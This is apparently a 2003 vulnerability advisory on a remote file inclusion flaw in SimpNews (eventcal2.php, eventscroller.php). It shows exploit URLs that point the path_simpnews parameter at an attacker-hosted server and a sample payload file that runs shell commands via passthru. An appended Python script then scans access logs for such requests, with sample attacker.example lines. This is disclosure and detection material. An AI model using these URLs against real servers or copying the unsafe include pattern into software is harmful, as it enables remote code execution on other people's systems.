Original file name : PUPET-simpnews.txt
Release date       : July 15, 2003

Information :
=========================
Advisory Name  : Simpnews include file Vulnerability
Author         : PUPET <pupet@cosmo.com>
Discovered by  : PUPET <pupet@cosmo.com>
Vendor website : http://www.boesch-it.de/
Versions       : tested on V2.01 -> V2.13
Problem        : Include file

PHP Code/Location :
=========================
/eventscroller.php :
---------------------------
...
require_once($path_simpnews.'/config.php');
require_once($path_simpnews.'/functions.php');
if(!isset($category))
    $category=0;
if(!isset($lang) || !$lang)
...
--------------------------

/eventcal2.php :
---------------------------
...
if(!isset($lastvisitdate))
    $lastvisitdate=0;
require_once($path_simpnews.'/config.php');
require_once($path_simpnews.'/functions.php');
include_once($path_simpnews.'/includes/has_entries.inc');
...
---------------------------

Exploits :
===============
http://[target]/eventcal2.php.php?path_simpnews=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.php
http://[attacker]/includes/has_entries.inc

or

http://[target]/eventscroller.php?path_simpnews=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.php

Example for config.php on http://[attacker]/
==================
<? passthru("uname -a"); ?>

Vendor Response :
==============
Not contacted yet

Patch :
=============
Will be posted soon at http://www.cracxer.or.id .

Reference :
=============
http://www.pupet.net/cracxerfiles

==============
This bug was discovered by : PUPET, member of cracxer.or.id, sub-division security focus (www.cracxer.or.id)

Thanks to :
============
kaka-joe , pak-tani , Bewok , AxAL , ^BuBuR^aYaM^ , Ernesto_che_guevarra , Babah , Idon Schatje , juventini , Headup , Quervo , kecap , notts , Kemo (candyman) and all crew #cracxer, #dhegleng, #minangcrew, #indocracker at @dalnet

By :
============
PUPET (no more mr nice guy)
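
Added example, not part of the original advisory and not vendor code: a Python check to run over web server access logs that flags requests supplying path_simpnews in the query string and separates values carrying a URL scheme from other values. The common/combined log format, the sample lines and the host names are constructed assumptions, as is the premise that legitimate pages set this variable in PHP and never through the URL.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

PARAM = "path_simpnews"          # variable named in the advisory
# A scheme/wrapper prefix (http:, ftp:, php:, data: ...) means the include target
# is not a local path. Two or more characters before ':' skip Windows drive letters.
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]+:", re.I)
# Request line of a common/combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (bounded) so %2568ttp... is read as http..."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return None, 'param-set' or 'remote-include' for one access log line."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    verdict = None
    query = urlsplit(m.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name != PARAM:
            continue
        if SCHEME.match(fully_decode(value)):
            return "remote-include"
        verdict = "param-set"    # assumption: clients never need to send this
    return verdict

def scan(lines):
    """Return (line_number, verdict, line) for every flagged entry."""
    return [(n, v, l) for n, l in enumerate(lines, 1) if (v := classify(l))]

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jul/2003:10:00:00 +0000] "GET /simpnews/eventscroller.php?category=2&lang=en HTTP/1.0" 200 5120',
    '192.0.2.77 - - [15/Jul/2003:10:01:12 +0000] "GET /simpnews/eventcal2.php?path_simpnews=http://attacker.example/ HTTP/1.0" 200 311',
    '192.0.2.77 - - [15/Jul/2003:10:01:40 +0000] "GET /simpnews/eventscroller.php?path_simpnews=%2568ttp%253A%252F%252Fattacker.example%252F HTTP/1.0" 200 311',
    '192.0.2.78 - - [15/Jul/2003:10:02:05 +0000] "GET /simpnews/eventscroller.php?path_simpnews=../../tmp HTTP/1.0" 200 98',
]

if __name__ == "__main__":
    for n, verdict, line in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}: {line}")
```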